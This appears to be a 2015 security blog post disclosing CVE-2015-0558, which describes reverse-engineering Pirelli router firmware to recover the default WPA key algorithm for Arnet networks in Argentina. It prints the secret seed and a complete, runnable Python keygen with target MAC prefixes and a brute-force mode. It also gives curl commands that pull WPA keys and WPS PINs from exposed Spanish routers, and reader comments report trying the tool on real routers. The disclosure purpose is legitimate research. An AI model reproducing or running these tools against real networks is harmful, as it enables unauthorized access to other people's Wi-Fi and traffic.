Inicio > Python, Reversing, Wireless > CVE-2015-0558: Reverse-engineering the default WPA key generation algorithm for Pirelli routers in Argentina

CVE-2015-0558: Reverse-engineering the default WPA key generation algorithm for Pirelli routers in Argentina

Lunes, 5 de enero de 2015 Dejar un comentario Ir a comentarios

Introduction

arnetrouter

Sticker with default settings

A couple of years ago whether I do not remember badly, I was doing reverse engineering in some Spanish routers deployed by Pirelli as well. After I extracted the firmware and found out a suspicious library with many references to key generation’s functions everything was over. Unfortunately, I could not recover the algorithm itself. Principally, because those routers were not using the same algorithm  for generating default keys and simply because such algorithm was not explicitly there. Shit happens!  However, as I could not reveal the algorithm then decided to try another way to recover keys. Eventually, I realised that these routers were vulnerable to unauthorized and unauthenticated remote access and any adversary could fetch HTML code from our public IP address. Plenty of HTMLs were able to be downloaded without any restriction, meaning a huge leakage. Being vulnerable to a bunch of evil attacks. This  remote information disclosure can be seen on this CVE-2015-0554. On the other side, I do not know whether Argentinian routers are also vulnerable to this vulnerability. Feel free to try it out and let me know too.

Just to see how easy was to achieve those keys in the HomeStation(essids-like WLAN_XXXX)  in Spain, a simple curl command was enough:

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
                  <option value='0'>WLAN_DEAD</option>

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin    = '12820078';

Today I am gonna explain how I reverse engineered a MIPS library in order to recover the default WPA key generation algorithm for some Argentinian routers deployed by Pirelli.  Concretely the router affected is the model P.DG-A4001N.  First of all, I am neither Argentinian nor live there. Nevertheless, accidentally  I observed some stickers from Pirelli routers in a random forum and as an user had already publicly published the firmware for those routers then I decided to give a try.  As I still remembered the file where I dug into for the Spanish routers,  I rapidly tried to recover the algorithm in these routers. Next writing is the way I followed until to achieve it.

Reverse-engineering the default key generation algorithm

In this section, we are going to reverse engineer a MIPS library, /lib/private/libcms.core,  found out in the firmware itself.  First of all, let us comment that the firmware was physically extracted for another user (fernando3k) and subsequently unpacked using Binwalk and firmware-mod-kit by me. Once was mounted into our system, we found out a function called generatekey. As you have seen,  symbols have not been removed in binaries and external function names are still there because dynamic compilation. This help us a lot in our reverse engineering task.  On top of that, we rapidly saw how this function was calling to another one called generatekey_from_mac. At this moment, I decided to give a go to this challenge. Before get started, IDA Pro can help us with the cross references (Xrefs to-from in IDA Pro) between functions. Let’s see how functions are called in the library. (Zoom pictures in to see properly)

 

Call flow from generateKey

Call flow from generateKey

 

 

 

Really looking great! Now let’s look at the cross references. We have figured out some tips:

  1. generatekey calls generatekey_from_mac.  This allow us to suppose that the mac address is involved in the key generation algorithm. Besides, getPBSHwaddr returns a mac address and it is also called by generatekey. Verification was carried out after checking how getPBSHwaddr returned the value of /var/hwaddr ( “ifconfig %s > /var/hwaddr “)
  2. SHA256 cryptographic hash function is also involved. We then know that our key is coming from a well-known hash function. This way to generate WPA keys is very popular in some vendors because the feeling of “randomness”. Digging into this function will give us the main structure of our algorithm.
  3.  The function createWPAPassphraseFromKey is called by wlWriteMdmDefault ,which also calls to generatekey as well. Hence, we  discover a function called bintoascii which  is basically responsible to convert binary to ascii data.
  4. The SSID is also created from the mac address although it is not relevant for our task.

 

Call flow for createWPAPassphraseFromKey

Call flow for createWPAPassphraseFromKey

 

Now we must dissect the generatekey_from_mac function and its SHA256 callings to figure out how many parameters are being sent as input data. Before calling generatekey, a string “1236790” is sent to this function as first argument ($a3).  Nonetheless, we have to guess which is the right order for the SHA256 function, I mean how many updates there are. If we observe the below picture, we will see this step.

 

createWPApassphrasefromkey

Dissasembly of wlWriteMdmDefault

 

 

From generateKey_from_mac we realise that: (Look at below image)

  1.  First argument is located at offset 0x000d29e0
  2.  Second argument is the string we discovered previously (“1236790”)
  3.  Third argument it has to be the mac address because there is an instruction load immediate with the value  6. Since a mac address is 6 bytes, we can try it out now.
sha256_seed

Dissasembly of generateKey_from_mac

 

As we know that the first argument is located at the offset 0xd29e0, just a jump there and let’s reveal the secret seed used in the SHA256.  Now we have guessed the first argument, and we can prepare those 32 bytes into a byte-array structure to generate the  SHA256 hash later on. This secret seed has been used by Pirelli too in other countries like Italy or Austria (Look at the references on the source code for more info). Furthermore, below that we can also distinguish the charset finally used to generate keys with.

seed

Secret data found out in the library.

 

 

In the end, we conclude that the algorithm is as follows: (mac address needs to be incremented by 1)

SHA256(secret_seed+”1236790″+mac_address)

 

 

More details on how keys are eventually generated  in this python function:

def genkey(mac):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')

    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
    
    sha256 = hashlib.sha256()
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)

    digest = bytearray(sha256.digest())
       
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

Problems

Since I attempted to do a responsible disclosure and neither ADB Pirelli nor Arnet Argentina were interested to discuss the problem, I have finally decided to do full disclosure to speed up the process of fixing. It looks like the only way with some vendors, just enforce them to replace routers for avoiding intrusions. Many things can happen whether your router with SSID Wifi-Arnet-XXXX has the default password. For your information, default passwords are located in a sticker at the bottom of routers. If you are owner of these networks, please change your password as soon as possible. You should always change the default passwords, though.

An adversary, within of the wifi range,  could access to your network and commit any sort of fraud. Be safe and change the passwords right now!

Timeline

2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail
2014-09-16  Send another message to Arnet via website.First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients’ security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure

Proof-of-concept

This proof-of-concept and many Pirelli default key generation algorithms might be found at my Bitbucket repository. I hope you can use them. Also a copy&paste of the first version can be looked at below.

To be installed just make sure you got git installed on your system and then run:

$ git clone https://dudux@bitbucket.org/dudux/adbpirelli.git
$ cd adbpirelli && chmod +x *.py
$ python wifiarnet.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-

'''
@license: GPLv3
@author : Eduardo Novella 
@contact: ednolo[a]inf.upv.es 
@twitter: @enovella_ 

-----------------
[*] Target      : 
-----------------
Vendor           : ADB broadband Pirelli
Router           : Model P.DG-A4001N
ISP              : Arnet Telecom Argentina
Possible-targets : http://hwaddress.com/?q=ADB%20Broadband%20Italia
Firmware         : http://foro.seguridadwireless.net/puntos-de-acceso-routers-switchs-y-bridges/obtener-firmware-adb-p-dg-a4001n-%28arnet-telecom-argentina%29/   

-----------------
[*] References  : 
-----------------
[0] [AUSTRIA] A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness    http://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/
[1] [ITALY]   Alice AGPF: The algorithm!                                            http://wifiresearchers.wordpress.com/2010/06/02/alice-agpf-lalgoritmo/
[2] [ARGENTINA] CVE-2015-0558: Reverse-engineering the default WPA key generation   http://ednolo.alumnos.upv.es/?p=1883
                algorithm for Pirelli routers in Argentina

-----------------
[*] Test vectors : 
-----------------
http://www.arg-wireless.com.ar/index.php?topic=1006.msg6551#msg6551

-----------------------
[*] Acknowledgements  : 
-----------------------
Thanks to fernando3k for giving me the firmware in order to do reverse-engineering on it , and christian32 for showing me a bunch of test vectors.

-----------------
[*] Timeline    : 
-----------------
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure and CVE-2015-0558 assigned

-----------------
[*] TODO        : 
-----------------
1.- Reverse-engineering the function generateSSIDfromTheMac. It is not relevant though.
2.- Extract more firmwares from others vendors and send them to me.

-----------------
[*] Changelog   : 
-----------------
2015-01-12   v1.2         Real bugfix for macddress
2015-01-10   v1.1         --allKeys flag added  && bugfix with macaddress' jumps (thanks to Nicolás Chaves)
2014-09-11   v1.0         First PoC working

'''

import re
import sys
import hashlib
import argparse

VERSION     = 1
SUBVERSION  = 2
DATEVERSION = '2015-01-12' 
URL         = 'http://www.ednolo.alumnos.upv.es'

def genkey(mac,stdout='True'):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')

    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
    
    sha256 = hashlib.sha256()
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)

    digest = bytearray(sha256.digest())

    if (stdout):
        print "[+] SHA256  : %s" % sha256.hexdigest()
        
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])


def printTargets():
        print "[+] Possible vulnerable targets so far:"
        for t in targets:
            print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX".format(t.upper()))

        sys.exit()

def checkTargets(bssid):
        supported = False
        for t in targets:
            if ( bssid.upper().startswith(t) ):
                supported = True
                break
        if (not supported):
            print "[!] Your bssid looks like not supported! Generating anyway."

def addIncToMac(mac_str, inc):
    try:
        mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc))
    except:
        sys.exit('[!] Use real input :)')
    return mac

def main():
    
    global targets
    version     = " {0:d}.{1:d}  [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL) 
    targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',
    '30:39:F2','74:88:8B','84:26:15','A4:52:6F','A4:5D:A1','D0:D4:12','D4:D1:84','DC:0B:1A','F0:84:2F']
    
    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina. So far 
                                                 only WiFi networks with essid like Wifi-Arnet-XXXX and manufactured by Pirelli are 
                                                 likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
                                                 Twitter: @enovella_  and   email: ednolo[at]inf.upv.es''',
                                                 epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])
                                    )
   
    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l','--list', help='List all vulnerable targets (essid Wifi-Arnet-XXXX)', action='store_true')
    command_group.add_argument('-a','--allkeys', action="store_true",  help='Bruteforce mode')
    
    args = parser.parse_args()

    if args.list:
        printTargets()
    elif args.bssid:
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')  
        try:
            
            checkTargets(args.bssid)
            print '[+] SSID    : WiFi-Arnet-XXXX' 
            print '[+] MAC     : %s' % args.bssid

            if (args.allkeys):
                print '[+] WPA key :'
                for i in xrange(-2,5):
                    mac = addIncToMac(mac_str,i)
                    print '\t%16s' % (genkey(mac,False))
            else:
                print '[+] WPA key : %s' % (genkey((addIncToMac(mac_str,0)),False)) 
        except:
            sys.exit('[!] Are you trying to crash me? :)')
    else:
	parser.print_help()

if __name__ == "__main__":
    main()
Related Posts Plugin for WordPress, Blogger...
Categories: Python, Reversing, Wireless Tags:
  1. Nicash
    Viernes, 9 de enero de 2015 a las 01:28 | #1

    ¡Buenísimo, amigo!
    Pero tuve que sacar el +1 de aquí para que me dé la clave correcta:

    mac = bytearray.fromhex(‘%012x’ %(int(mac_str,16) +1))

    Lo probé en 2 routers. Uno con MAC F0:84:2F y en uno con MAC A4:52:6F.
    Lo curioso de este último fue que mientras el scanner me marcaba que la MAC terminaba en 4A14, en la etiqueta del router decía 4A13.. así que fue esto lo que me llevó a sacar el +1 y comprobar que me daba la clave correcta de los 2!!

    ¡¡Saludos!! ¡¡Y gracias!!

    • superdudu
      Viernes, 9 de enero de 2015 a las 18:27 | #2

      (Spanish: Perdona, pero te voy a contestar en Inglés. Asi tod@s son capaces de entenderlo.)

      It is explained in the post. And the proof-of-concept is doing it properly.

      “In the end, we conclude that the algorithm is as follows: (mac address needs to be incremented by 1)
      SHA256(secret_seed+”1236790″+mac_address)”

      Just let me know if some macs are not working. I just tried the stickers which are in the test vector link at my source code.

      Cheers

    • superdudu
      Sábado, 10 de enero de 2015 a las 14:12 | #3

      I misunderstood the verb “sacar”. In Spanish from Spain means “figure out”. But you meant : “pull off – remove -delete”. I got it now.
      Can you give me more details? I will add it whenever I got some of sparse time

  2. Domingo, 11 de enero de 2015 a las 15:57 | #4
  3. David
    Domingo, 25 de enero de 2015 a las 09:54 | #5

    In italy we have Telecom-XXXXXX, I tried with Telecom-74489717,00:8C:54:70:9F:7B, it didn’t worked.
    I will try with other networks soon

  4. David
    Viernes, 30 de enero de 2015 a las 22:24 | #6

    I just extracted the firmware and there is no libcms.core, so the routers should be different.

  5. superdudu
    Sábado, 31 de enero de 2015 a las 13:04 | #7

    Is this router manufactured by Pirelli? You can send me the firmware if you want.

  6. David
    Domingo, 8 de febrero de 2015 a las 12:57 | #8

    someone by pirelli, someone by ” adb broadband italia”
    however these should be the firmwares:
    http://repository.ilpuntotecnicoeadsl.com/index.php?dir=jackthevendicator/official/agpwi/

  1. Jueves, 15 de enero de 2015 a las 04:41 | #1
  2. Domingo, 18 de enero de 2015 a las 08:55 | #2
  3. Jueves, 7 de mayo de 2015 a las 21:27 | #3

Show me what you are not a r0b0t! :) *
Time limit is exhausted. Please reload CAPTCHA.

Maximum 2 links per comment. Do not use BBCode.